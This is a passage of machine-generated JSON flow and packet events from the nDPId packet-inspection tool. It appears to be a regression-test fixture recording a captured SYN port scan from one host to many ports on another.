-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsowkAAC0GeGmsEAAIQA2GNIzTAprdU4MZAAAAAGACCAAt8gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsNmQAAC4G5A6sEAAIQA2GNIzTCU7dU4MZAAAAAGACDAAjPgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAslb0AACYGjLWsEAAIQA2GNIzTDSndU4MZAAAAAGACDAAfYwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAs9egAADAGIoqsEAAIQA2GNIzTABrdU4MZAAAAAGACBAA0cgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsBpsAACcGGtisEAAIQA2GNIzTX3zdU4MZAAAAAGACEADJDwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsFHoAADIGAfmsEAAIQA2GNIzTDubdU4MZAAAAAGACDAAdpgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAshuMAADUGjI+sEAAIQA2GNIzTGivdU4MZAAAAAGACCAAWYQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsa28AACwGsQOsEAAIQA2GNIzTABHdU4MZAAAAAGACBAA0ewAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs1BIAADMGQWCsEAAIQA2GNIzTFF7dU4MZAAAAAGACEAAULgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsyOsAADQGS4esEAAIQA2GNIzSEyPdUoMYAAAAAGACBAAhbAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsMVIAACcG8CCsEAAIQA2GNIzSzoXdUoMYAAAAAGACEABaCQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsMDcAADAG6DusEAAIQA2GNIzSD6bdUoMYAAAAAGACBAAk6QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs8eUAADYGII2sEAAIQA2GNIzSDaXdUoMYAAAAAGACDAAe6gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsK+QAADAG7I6sEAAIQA2GNIzSDpndUoMYAAAAAGACBAAl9gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsbD8AACsGsTOsEAAIQA2GNIzSFGXdUoMYAAAAAGACEAAUKgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsX\/kAACUGw3msEAAIQA2GNIzSE9jdUoMYAAAAAGACCAActwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs3xYAACYGQ1ysEAAIQA2GNIzSB+TdUoMYAAAAAGACDAAkqwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsbhsAAC8Gq1esEAAIQA2GNIzSu9DdUoMYAAAAAGACEABsvgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsIgMAADsG62+sEAAIQA2GNIzSTv7dUoMYAAAAAGACEADZkAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsyKUAACsGVM2sEAAIQA2GNIzSF0vdUoMYAAAAAGACEAARRAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsbzMAADQGpT+sEAAIQA2GNIzSBfTdUoMYAAAAAGACBAAumwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsq8MAADUGZ6+sEAAIQA2GNIzSBILdUoMYAAAAAGACCAAsDQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsphAAADsGZ2KsEAAIQA2GNIzSH5bdUoMYAAAAAGACEAAI+QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsMxUAADMG4l2sEAAIQA2GNIzSBBfdUoMYAAAAAGACEAAkeAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsHAEAADUG93GsEAAIQA2GNIzSBCTdUoMYAAAAAGACCAAsawAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 